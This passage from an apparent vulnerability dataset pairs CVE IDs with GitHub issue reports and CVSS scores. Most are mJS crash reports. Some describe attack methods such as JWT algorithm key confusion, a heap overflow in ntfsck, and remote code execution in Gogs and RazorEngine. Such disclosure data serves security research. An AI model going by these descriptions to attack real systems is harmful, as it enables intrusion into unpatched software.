  77877. "Issue_Created_At": "2021-12-31T07:41:02Z",
  77878. "description": "SEGV APITAG in mjs_execute. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77879. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77880. "severity": "MEDIUM",
  77881. "baseScore": 5.5,
  77882. "impactScore": 3.6,
  77883. "exploitabilityScore": 1.8
  77884. },
  77885. {
  77886. "CVE_ID": "CVE-2021-46531",
  77887. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/211",
  77888. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/211",
  77889. "Repo_new": "cesanta/mjs",
  77890. "Issue_Created_At": "2021-12-31T07:48:04Z",
  77891. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77892. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77893. "severity": "MEDIUM",
  77894. "baseScore": 5.5,
  77895. "impactScore": 3.6,
  77896. "exploitabilityScore": 1.8
  77897. },
  77898. {
  77899. "CVE_ID": "CVE-2021-46532",
  77900. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/203",
  77901. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/203",
  77902. "Repo_new": "cesanta/mjs",
  77903. "Issue_Created_At": "2021-12-31T07:34:16Z",
  77904. "description": "SEGV APITAG in exec_expr. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Test case2 APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77905. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77906. "severity": "MEDIUM",
  77907. "baseScore": 5.5,
  77908. "impactScore": 3.6,
  77909. "exploitabilityScore": 1.8
  77910. },
  77911. {
  77912. "CVE_ID": "CVE-2021-46534",
  77913. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/204",
  77914. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/204",
  77915. "Repo_new": "cesanta/mjs",
  77916. "Issue_Created_At": "2021-12-31T07:36:20Z",
  77917. "description": "SEGV APITAG in getprop_builtin_foreign. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77918. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77919. "severity": "MEDIUM",
  77920. "baseScore": 5.5,
  77921. "impactScore": 3.6,
  77922. "exploitabilityScore": 1.8
  77923. },
  77924. {
  77925. "CVE_ID": "CVE-2021-46535",
  77926. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/209",
  77927. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/209",
  77928. "Repo_new": "cesanta/mjs",
  77929. "Issue_Created_At": "2021-12-31T07:45:23Z",
  77930. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Version: Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  77931. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77932. "severity": "MEDIUM",
  77933. "baseScore": 5.5,
  77934. "impactScore": 3.6,
  77935. "exploitabilityScore": 1.8
  77936. },
  77937. {
  77938. "CVE_ID": "CVE-2021-46537",
  77939. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/212",
  77940. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/212",
  77941. "Repo_new": "cesanta/mjs",
  77942. "Issue_Created_At": "2021-12-31T07:49:30Z",
  77943. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77944. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77945. "severity": "MEDIUM",
  77946. "baseScore": 5.5,
  77947. "impactScore": 3.6,
  77948. "exploitabilityScore": 1.8
  77949. },
  77950. {
  77951. "CVE_ID": "CVE-2021-46538",
  77952. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/216",
  77953. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/216",
  77954. "Repo_new": "cesanta/mjs",
  77955. "Issue_Created_At": "2021-12-31T07:56:05Z",
  77956. "description": "SEGV APITAG in gc_compact_strings. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG Execution steps & Output ERRORTAG",
  77957. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77958. "severity": "MEDIUM",
  77959. "baseScore": 5.5,
  77960. "impactScore": 3.6,
  77961. "exploitabilityScore": 1.8
  77962. },
  77963. {
  77964. "CVE_ID": "CVE-2021-46539",
  77965. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/217",
  77966. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/217",
  77967. "Repo_new": "cesanta/mjs",
  77968. "Issue_Created_At": "2021-12-31T07:57:19Z",
  77969. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77970. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77971. "severity": "MEDIUM",
  77972. "baseScore": 5.5,
  77973. "impactScore": 3.6,
  77974. "exploitabilityScore": 1.8
  77975. },
  77976. {
  77977. "CVE_ID": "CVE-2021-46540",
  77978. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/214",
  77979. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/214",
  77980. "Repo_new": "cesanta/mjs",
  77981. "Issue_Created_At": "2021-12-31T07:53:19Z",
  77982. "description": "SEGV APITAG in mjs_get_mjs . mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77983. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77984. "severity": "MEDIUM",
  77985. "baseScore": 5.5,
  77986. "impactScore": 3.6,
  77987. "exploitabilityScore": 1.8
  77988. },
  77989. {
  77990. "CVE_ID": "CVE-2021-46541",
  77991. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/222",
  77992. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/222",
  77993. "Repo_new": "cesanta/mjs",
  77994. "Issue_Created_At": "2021-12-31T08:03:15Z",
  77995. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77996. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77997. "severity": "MEDIUM",
  77998. "baseScore": 5.5,
  77999. "impactScore": 3.6,
  78000. "exploitabilityScore": 1.8
  78001. },
  78002. {
  78003. "CVE_ID": "CVE-2021-46542",
  78004. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/215",
  78005. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/215",
  78006. "Repo_new": "cesanta/mjs",
  78007. "Issue_Created_At": "2021-12-31T07:54:36Z",
  78008. "description": "SEGV APITAG in mjs_print. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  78009. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78010. "severity": "MEDIUM",
  78011. "baseScore": 5.5,
  78012. "impactScore": 3.6,
  78013. "exploitabilityScore": 1.8
  78014. },
  78015. {
  78016. "CVE_ID": "CVE-2021-46543",
  78017. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/219",
  78018. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/219",
  78019. "Repo_new": "cesanta/mjs",
  78020. "Issue_Created_At": "2021-12-31T07:59:21Z",
  78021. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78022. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78023. "severity": "MEDIUM",
  78024. "baseScore": 5.5,
  78025. "impactScore": 3.6,
  78026. "exploitabilityScore": 1.8
  78027. },
  78028. {
  78029. "CVE_ID": "CVE-2021-46544",
  78030. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/220",
  78031. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/220",
  78032. "Repo_new": "cesanta/mjs",
  78033. "Issue_Created_At": "2021-12-31T08:00:38Z",
  78034. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  78035. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78036. "severity": "MEDIUM",
  78037. "baseScore": 5.5,
  78038. "impactScore": 3.6,
  78039. "exploitabilityScore": 1.8
  78040. },
  78041. {
  78042. "CVE_ID": "CVE-2021-46545",
  78043. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/218",
  78044. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/218",
  78045. "Repo_new": "cesanta/mjs",
  78046. "Issue_Created_At": "2021-12-31T07:58:22Z",
  78047. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78048. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78049. "severity": "MEDIUM",
  78050. "baseScore": 5.5,
  78051. "impactScore": 3.6,
  78052. "exploitabilityScore": 1.8
  78053. },
  78054. {
  78055. "CVE_ID": "CVE-2021-46546",
  78056. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/213",
  78057. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/213",
  78058. "Repo_new": "cesanta/mjs",
  78059. "Issue_Created_At": "2021-12-31T07:50:54Z",
  78060. "description": "SEGV APITAG in mjs_next. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78061. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78062. "severity": "MEDIUM",
  78063. "baseScore": 5.5,
  78064. "impactScore": 3.6,
  78065. "exploitabilityScore": 1.8
  78066. },
  78067. {
  78068. "CVE_ID": "CVE-2021-46547",
  78069. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/221",
  78070. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/221",
  78071. "Repo_new": "cesanta/mjs",
  78072. "Issue_Created_At": "2021-12-31T08:01:57Z",
  78073. "description": "SEGV ( PATHTAG ). mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78074. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78075. "severity": "MEDIUM",
  78076. "baseScore": 5.5,
  78077. "impactScore": 3.6,
  78078. "exploitabilityScore": 1.8
  78079. },
  78080. {
  78081. "CVE_ID": "CVE-2021-46548",
  78082. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/228",
  78083. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/228",
  78084. "Repo_new": "cesanta/mjs",
  78085. "Issue_Created_At": "2021-12-31T08:09:27Z",
  78086. "description": "SEGV APITAG in add_lineno_map_item. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78087. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78088. "severity": "MEDIUM",
  78089. "baseScore": 5.5,
  78090. "impactScore": 3.6,
  78091. "exploitabilityScore": 1.8
  78092. },
  78093. {
  78094. "CVE_ID": "CVE-2021-46549",
  78095. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/224",
  78096. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/224",
  78097. "Repo_new": "cesanta/mjs",
  78098. "Issue_Created_At": "2021-12-31T08:05:23Z",
  78099. "description": "SEGV APITAG in parse_cval_type. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Execution steps & Output ERRORTAG",
  78100. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78101. "severity": "MEDIUM",
  78102. "baseScore": 5.5,
  78103. "impactScore": 3.6,
  78104. "exploitabilityScore": 1.8
  78105. },
  78106. {
  78107. "CVE_ID": "CVE-2021-46550",
  78108. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/230",
  78109. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/230",
  78110. "Repo_new": "cesanta/mjs",
  78111. "Issue_Created_At": "2021-12-31T08:11:01Z",
  78112. "description": "SEGV APITAG in free_json_frame. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78113. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78114. "severity": "MEDIUM",
  78115. "baseScore": 5.5,
  78116. "impactScore": 3.6,
  78117. "exploitabilityScore": 1.8
  78118. },
  78119. {
  78120. "CVE_ID": "CVE-2021-46553",
  78121. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/226",
  78122. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/226",
  78123. "Repo_new": "cesanta/mjs",
  78124. "Issue_Created_At": "2021-12-31T08:07:24Z",
  78125. "description": "SEGV APITAG in mjs_set_internal. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78126. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78127. "severity": "MEDIUM",
  78128. "baseScore": 5.5,
  78129. "impactScore": 3.6,
  78130. "exploitabilityScore": 1.8
  78131. },
  78132. {
  78133. "CVE_ID": "CVE-2021-46554",
  78134. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/229",
  78135. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/229",
  78136. "Repo_new": "cesanta/mjs",
  78137. "Issue_Created_At": "2021-12-31T08:10:12Z",
  78138. "description": "SEGV APITAG in mjs_json_stringify. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78139. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78140. "severity": "MEDIUM",
  78141. "baseScore": 5.5,
  78142. "impactScore": 3.6,
  78143. "exploitabilityScore": 1.8
  78144. },
  78145. {
  78146. "CVE_ID": "CVE-2021-46556",
  78147. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/227",
  78148. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/227",
  78149. "Repo_new": "cesanta/mjs",
  78150. "Issue_Created_At": "2021-12-31T08:08:18Z",
  78151. "description": "SEGV APITAG in mjs_bcode_insert_offset. mJS revision Commit: b1b6eac URLTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  78152. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78153. "severity": "MEDIUM",
  78154. "baseScore": 5.5,
  78155. "impactScore": 3.6,
  78156. "exploitabilityScore": 1.8
  78157. },
  78158. {
  78159. "CVE_ID": "CVE-2021-46700",
  78160. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/158",
  78161. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/158",
  78162. "Repo_new": "saitoha/libsixel",
  78163. "Issue_Created_At": "2021-11-07T11:26:43Z",
  78164. "description": "double free or corruption in .",
  78165. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78166. "severity": "MEDIUM",
  78167. "baseScore": 6.5,
  78168. "impactScore": 3.6,
  78169. "exploitabilityScore": 2.8
  78170. },
  78171. {
  78172. "CVE_ID": "CVE-2021-46701",
  78173. "Issue_Url_old": "https://github.com/PreMiD/PreMiD/issues/790",
  78174. "Issue_Url_new": "https://github.com/premid/premid/issues/790",
  78175. "Repo_new": "premid/premid",
  78176. "Issue_Created_At": "2021-12-17T21:25:29Z",
  78177. "description": "APITAG Server (socket.io) is possible to be accessed from socket.io client. Explanation Some time ago, there was fix for allowing only chrome extension to connect to server APITAG app), but, after researching socket.io NUMBERTAG documentation, I noticed that I can still access server by just selecting transport as websocket . It works on localhost and can be done on websites. It allows to receive and emit events to socket. Steps to reproduce Go to FILETAG Open Console You should get two things from app: Version Discord User and APITAG app should open file dialog to \"select local presence\" Code how to access socket CODETAG How to fix that? No information on it for now. I may look for fix, but I want to report it first because I respect some people here and some, I don't. I bet someone will find way to fix it before me finding a way. Regards, ririxi.",
  78178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
  78179. "severity": "MEDIUM",
  78180. "baseScore": 6.5,
  78181. "impactScore": 2.5,
  78182. "exploitabilityScore": 3.9
  78183. },
  78184. {
  78185. "CVE_ID": "CVE-2021-46703",
  78186. "Issue_Url_old": "https://github.com/Antaris/RazorEngine/issues/585",
  78187. "Issue_Url_new": "https://github.com/antaris/razorengine/issues/585",
  78188. "Repo_new": "antaris/razorengine",
  78189. "Issue_Created_At": "2021-12-16T16:06:38Z",
  78190. "description": "Announcement: Security with APITAG . This issue is to inform everyone that APITAG , which uses CAS internally, should not be considered 'secure' anymore for various reasons: CAS was obsoleted quite a while now URLTAG CAS Is not supported on latest platform updates URLTAG (.NET NUMBERTAG APITAG Core) Microsoft will no longer provide patches for security issues URLTAG In addition to the above the following code sample was reported to me as an issue of APITAG itself (thanks APITAG ERRORTAG If you depend on APITAG for security I'd urge you to redesign your security. If you need a fast fix, you can use the FILETAG and compile APITAG yourself (however, you will no longer be able to use 'dynamic' with this patch). Just to clarify, you are only affected by this IF: you currently use APITAG and use CAS to control the template permissions if users can externally control the template contents If you use APITAG for E Mail generation or templating Engine (documentation generation, ...) you are most likely not directly affected by this issue, even if you use APITAG as long as you use APITAG 'correctly'. Correct usage means that you don't allow direct user input to parts of the template. This mistake can happen if you use for example by string concatenation instead of using APITAG Syntax Elements. Just to remind you: If you use string concatenation to build your template with untrusted user inputs, you allow your users to execute code on your system. This is most likely not what you want with or without Isolation!",
  78191. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  78192. "severity": "CRITICAL",
  78193. "baseScore": 9.8,
  78194. "impactScore": 5.9,
  78195. "exploitabilityScore": 3.9
  78196. },
  78197. {
  78198. "CVE_ID": "CVE-2021-46743",
  78199. "Issue_Url_old": "https://github.com/firebase/php-jwt/issues/351",
  78200. "Issue_Url_new": "https://github.com/firebase/php-jwt/issues/351",
  78201. "Repo_new": "firebase/php-jwt",
  78202. "Issue_Created_At": "2021-08-04T05:17:10Z",
  78203. "description": "Possibility of Reintroducing HS NUMBERTAG RSA NUMBERTAG Type Confusion. This is a follow up to the HS NUMBERTAG RS NUMBERTAG Type Confusion attack URLTAG against the JWT protocol. Now, firebase/php jwt attempts to side step this risk by forcing the user to hard code the algorithms they wish to support. URLTAG If APITAG is an array, and APITAG contains a kid field, the key used to verify a token is determined by the kid header. URLTAG Let's say you're a service that wants to check APITAG tokens against one key type and APITAG tokens against another. Your APITAG key has APITAG , while your APITAG public key has APITAG . You might call php jwt like so: CODETAG If anyone ever sets up JWT like this: Congratulations! you've just reintroduced the critical vulnerability in your usage of the app. All you have to do is set APITAG and use the SHA NUMBERTAG hash of the RSA public key as an HMAC key, and you can mint tokens all day long. What's going on here? The fundamental problem is that the keys passed to firebase/php jwt are just strings. This flies in the face of cryptography engineering best practices: A key should always be considered to be the raw key material alongside its parameter choices URLTAG . Is this a security vulnerability? This is not a vulnerability in the firebase/php jwt library. It is, however, a very sharp edge that an unsuspecting developer could cut themselves on. Cryptography should be easy to use, hard to misuse, and secure by default. Whether the JOSE authors want to acknowledge it or not, what they published was a cryptographic protocol one that fails to live up to these tenets. It's worth noting that PASETO URLTAG mitigates this in its specification, so library authors don't have to even worry about it. The good news is: This can be easily fixed. The bad news is: It constitutes a backwards compatibility break. How to Fix This Library If you were to update the API to require keys to be a Keyring object, which maps a string APITAG ( kid ) to a APITAG object and that APITAG object had a hard coded algorithm that it could be used with then this issue would be easily avoided. Pseudocode ERRORTAG ERRORTAG ERRORTAG CODETAG ERRORTAG",
  78204. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  78205. "severity": "CRITICAL",
  78206. "baseScore": 9.1,
  78207. "impactScore": 5.2,
  78208. "exploitabilityScore": 3.9
  78209. },
  78210. {
  78211. "CVE_ID": "CVE-2021-46790",
  78212. "Issue_Url_old": "https://github.com/tuxera/ntfs-3g/issues/16",
  78213. "Issue_Url_new": "https://github.com/tuxera/ntfs-3g/issues/16",
  78214. "Repo_new": "tuxera/ntfs-3g",
  78215. "Issue_Created_At": "2021-11-25T22:42:53Z",
  78216. "description": "Heap overflow in ntfsck. Hello. I have found a vulnerability in the NTFS NUMBERTAG G driver, specifically in the ntfsck tool (see: FILETAG . In the _check_file_record_ function, the update sequence array is applied, but no proper boundary checks are implemented, so the function can write bytes from the update sequence array beyond the buffer being checked. The vulnerable code is here URLTAG : usa_ofs = le NUMBERTAG to_cpu(mft_rec >usa_ofs); usa_count = le NUMBERTAG to_cpu(mft_rec >usa_count); [...] // Remove update seq & check it. usa = (u NUMBERTAG buffer+usa_ofs); // The value that should be at the end of every sector. assert_u NUMBERTAG equal(usa_count NUMBERTAG buflen/NTFS_BLOCK_SIZE, \"USA length\"); for (i NUMBERTAG i<usa_count;i++) { u NUMBERTAG fixup = (u NUMBERTAG buffer+NTFS_BLOCK_SIZE i NUMBERTAG the value at the end of the sector. u NUMBERTAG saved_val = (u NUMBERTAG buffer+usa_ofs NUMBERTAG i); // the actual data value that was saved in the us array. assert_u NUMBERTAG equal( fixup, usa, \"fixup\"); fixup = saved_val; // remove it. } If _buflen_ is NUMBERTAG but the update sequence array contains NUMBERTAG entries (including the first one, which you call _usa_), the loop will replace bytes NUMBERTAG times, at the following offsets: APITAG (within the buffer), APITAG (within the buffer), APITAG (beyond the allocated buffer size). APITAG offset of the first attribute should be set to make room for additional entries in the update sequence array, so the _usa_ofs+usa_count <= attrs_offset_ check is passed.) Thus, bytes beyond the allocated buffer can be replaced, this is a heap overflow. It should be noted that the _assert_u NUMBERTAG equal_ function just reports the errors, it doesn\u2019t terminate the execution flow. Since the _ntfsck_ tool is used in some APITAG distributions (it\u2019s APITAG in Fedora), I strongly suggest implementing a fix. Report date (to _info at tuxera dot com NUMBERTAG No reply. Ping (to _info at tuxera dot com NUMBERTAG No reply.",
  78217. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  78218. "severity": "HIGH",
  78219. "baseScore": 7.8,
  78220. "impactScore": 5.9,
  78221. "exploitabilityScore": 1.8
  78222. },
  78223. {
  78224. "CVE_ID": "CVE-2022-0088",
  78225. "Issue_Url_old": "https://github.com/YOURLS/YOURLS/issues/3170",
  78226. "Issue_Url_new": "https://github.com/yourls/yourls/issues/3170",
  78227. "Repo_new": "yourls/yourls",
  78228. "Issue_Created_At": "2021-12-25T11:28:04Z",
  78229. "description": "Add nonce to the logout link. The logout link doesn't check for a nonce, see URLTAG A mean ha NUMBERTAG r can trick a naive user into logging out themselves if they're redirected to APITAG . Definitely not a big deal, but also trivial to fix.",
  78230. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  78231. "severity": "HIGH",
  78232. "baseScore": 7.4,
  78233. "impactScore": 4.0,
  78234. "exploitabilityScore": 2.8
  78235. },
  78236. {
  78237. "CVE_ID": "CVE-2022-0415",
  78238. "Issue_Url_old": "https://github.com/gogs/gogs/issues/6833",
  78239. "Issue_Url_new": "https://github.com/gogs/gogs/issues/6833",
  78240. "Repo_new": "gogs/gogs",
  78241. "Issue_Created_At": "2022-03-11T15:37:36Z",
  78242. "description": "Remote command execution vulnerability in file uploading. Gogs version APITAG Git version N/A Operating system APITAG NUMBERTAG Database N/A Describe the bug A remote command execution vulnerability exists in Gogs that could allow a malicious user to execute any command on the remote server and gain the privileged user account. Here is the report on huntr.dev URLTAG To reproduce See report on huntr.dev Expected behavior See report on huntr.dev Additional context _No response_ Code of Conduct [X] I agree to follow this project's Code of Conduct",
  78243. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  78244. "severity": "HIGH",
  78245. "baseScore": 8.8,
  78246. "impactScore": 5.9,
  78247. "exploitabilityScore": 2.8
  78248. },
  78249. {
  78250. "CVE_ID": "CVE-2022-0534",
  78251. "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/463",
  78252. "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/463",
  78253. "Repo_new": "michaelrsweet/htmldoc",
  78254. "Issue_Created_At": "2022-01-07T14:45:56Z",
  78255. "description": "Stack out of bounds read in APITAG In APITAG , in FILETAG , there is a stack out of bounds read in the following code: ERRORTAG The expression APITAG , line NUMBERTAG can result in an integer overflow when APITAG , updating curbit to a large number since it is unsigned. Later on line NUMBERTAG the variable i is set to number less than APITAG , since ERRORTAG overflows, which results after a few iterations in a stack out of bounds read in APITAG . I've attached FILETAG that contains a malicious gif and a html file and triggers the out of bounds read resulting in a segmentation fault. Steps to reproduce The following should result in a segmentation fault: ERRORTAG Steps to analyse the crash on gdb CODETAG",
  78256. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  78257. "severity": "MEDIUM",
  78258. "baseScore": 5.5,
  78259. "impactScore": 3.6,
  78260. "exploitabilityScore": 1.8
  78261. },
  78262. {
  78263. "CVE_ID": "CVE-2022-0671",
  78264. "Issue_Url_old": "https://github.com/eclipse/lemminx/issues/1169",
